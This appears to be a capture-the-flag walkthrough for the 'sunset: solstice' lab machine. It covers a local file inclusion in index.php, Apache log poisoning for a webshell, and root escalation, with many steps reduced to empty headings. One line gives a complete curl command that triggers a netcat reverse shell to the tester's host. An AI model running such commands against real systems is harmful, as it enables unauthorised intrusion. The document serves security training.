sunset: solstice Walkthrough
reference | sunset: solstice |
target ip | 192.168.1.18 |
Scan with nmap
:
After a simple manual enuemration, http://192.168.1.18:8593/index.php?book=list
is vulnerable to LFI:
Log poison, to get a webshell:
Reverse shell:
1 | curl -s "http://192.168.1.18:8593/index.php?book=../../../../../../../var/log/apache2/access.log&cmd=nc%20192.168.1.89%20443%20-e%20/bin/bash%20&" |
Enumerate the processes:
Escalate from user www-data to user root:
/root/root.txt
:
/home/miguel/user.txt
:
/var/log/apache2/access.log
,/var/log/apache2/access.log.1
,/var/log/apache2/error.log
,/var/log/apache2/error.log.1
:
/var/tmp/webserver/index.html
/var/tmp/webserver_2/project/config.php
:
Request http://192.168.1.18:54787/project/index.php
:
/var/tmp/fake_ftp/script.py
FTP 21:
no write permission
MD5 encrypted, which is asdadsad
/usr/local/bin/ftpbench